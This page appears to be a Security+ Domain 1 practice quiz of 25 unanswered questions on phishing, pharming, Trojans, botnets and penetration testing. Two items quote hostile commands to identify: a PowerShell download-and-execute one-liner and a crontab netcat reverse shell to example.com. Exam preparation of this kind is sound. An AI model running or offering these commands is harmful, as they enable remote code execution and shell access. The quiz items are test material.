0%
Created by agyenbons

Sec+ Practice Domain1

1 / 25

Category: Sec+ Domain 1

216.      Some users on your network use Acme Bank for their personal banking. Those users have all recently been the victim of an attack, in which they visited a fake Acme Bank website and their logins were compromised. They all visited the bank website from your network, and all of them insist they typed in the correct URL. What is the most likely explanation for this situation?

2 / 25

Category: Sec+ Domain 1

205.      Claire discovers the following PowerShell script. What does it do? powershell.exe -ep Bypass -nop -noexit -c iex. ((New ObjectNet.WebClient). DownloadString('https://example.com/file.psl))

3 / 25

Category: Sec+ Domain 1

203.      SourceForge and GitHub are both examples of what type of threat intelligence source?

4 / 25

Category: Sec+ Domain 1

189.      During what phase of a penetration test is information like employee names, phone number, and email addresses gathered?

5 / 25

Category: Sec+ Domain 1

186.      Angela reviews bulletins and advisories to determine what threats her organization is likely to face. What type of activity is this associated with?

6 / 25

Category: Sec+ Domain 1

179.      What term is used to describe mapping wireless networks while driving?

7 / 25

Category: Sec+ Domain 1

164.      What threat hunting concept involves thinking like a malicious actor to help identify indicators of compromise that might otherwise be hidden?

8 / 25

Category: Sec+ Domain 1

161.      Amanda encounters a Bash script that runs the following command: crontab -e 0 * * * * nc example.com 8989 -e /bin/bash What does this command do?

9 / 25

Category: Sec+ Domain 1

159.      You have noticed that when in a crowded area, data from your cell phone is stolen. Later investigation shows a Bluetooth connection to your phone, one that you cannot explain. What describes this attack?

10 / 25

Category: Sec+ Domain 1

127.      You are responsible for software testing at Acme Corporation. You want to check all soft- ware for bugs that might be used by an attacker to gain entrance into the software or your network. You have discovered a web application that would allow a user to attempt to put a 64-bit value into a 4-byte integer variable. What is this type of flaw?

11 / 25

Category: Sec+ Domain 1

119.     Your company is instituting a new security awareness program. You are responsible for edu- cating end users on a variety of threats, including social engineering. Which of the following best defines social engineering?

12 / 25

Category: Sec+ Domain 1

118.      What type of penetration test is being done when the tester is given extensive knowledge of the target network?

13 / 25

Category: Sec+ Domain 1

109.      Acme Company is using smartcards that use near-field communication (NFC) rather than needing to be swiped. This is meant to make physical access to secure areas more secure. What vulnerability might this also create?

14 / 25

Category: Sec+ Domain 1

101.      Which of the following best describes software that will provide the attacker with remote access to the victim’s machine but that is wrapped with a legitimate program in an attempt to trick the victim into installing it?

15 / 25

Category: Sec+ Domain 1

94.      What type of attack uses a second wireless access point (WAP) that broadcasts the same SSID as a legitimate access point, in an attempt to get users to connect to the attacker’s WAP?

16 / 25

Category: Sec+ Domain 1

90.      What two techniques are most commonly associated with a pharming attack?

17 / 25

Category: Sec+ Domain 1

87.      What is the primary difference between an intrusive and a nonintrusive vulnerability scan?

18 / 25

Category: Sec+ Domain 1

83.      Postings from Russian agents during the 2016 U.S. presidential campaign to Facebook and Twitter are an example of what type of effort?

19 / 25

Category: Sec+ Domain 1

71.      Amanda scans a Red Hat Linux server that she believes is fully patched and discovers that the Apache version on the server is reported as vulnerable to an exploit from a few months ago. When she checks to see if she is missing patches, Apache is fully patched. What has occurred?

20 / 25

Category: Sec+ Domain 1

68.      An attacker is trying to get access to your network. He is sending users on your network a link to a new game with a hacked license code program. However, the game files also include software that will give the attacker access to any machine that it is installed on. What type of attack is this?

21 / 25

Category: Sec+ Domain 1

50.      Your wireless network has been breached. It appears the attacker modified a portion of data used with the stream cipher and used this to expose wirelessly encrypted data. What is this attack called?

22 / 25

Category: Sec+ Domain 1

49.      Which of the following is not a common means of attacking RFID badges?

23 / 25

Category: Sec+ Domain 1

45.      Dennis uses an on-path attack to cause a system to send HTTPS traffic to his system and then forwards it to the actual server the traffic is intended for. What type of password attack can he conduct with the data he gathers if he captures all the traffic from a login form?

24 / 25

Category: Sec+ Domain 1

43.      What risk is commonly associated with a lack of vendor support for a product, such as an outdated version of a device?

25 / 25

Category: Sec+ Domain 1

27.      Which of the following best describes a collection of computers that have been compromised and are being controlled from one central point?

Leave a Comment

Your email address will not be published. Required fields are marked *